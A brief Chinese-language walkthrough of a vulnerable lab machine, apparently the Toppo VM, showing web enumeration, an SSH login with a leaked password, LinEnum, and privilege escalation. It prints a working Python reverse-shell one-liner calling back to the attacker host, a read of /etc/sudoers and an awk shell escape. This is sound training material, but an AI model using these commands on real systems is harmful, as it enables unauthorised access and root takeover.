环境准备
靶机 192.168.116.138
攻击机kali 192.168.116.130
演示
直接访问web
admin目录下存在密码本
使用ssh连接,账号ted,密码12345ted123
使用项目进行探测LinEnum
https://github.com/rebootuser/LinEnum
存在python可以使用suid提权
使用python反弹shell
/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.116.130",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
还可以使用sudo进行提权,
cat /etc/sudoers
在网站搜索awk
/usr/bin/awk 'BEGIN {system("/bin/sh")}'
标签:bin,sudo,socket,toppo,192.168,提权,os From: https://www.cnblogs.com/re8sd/p/17968003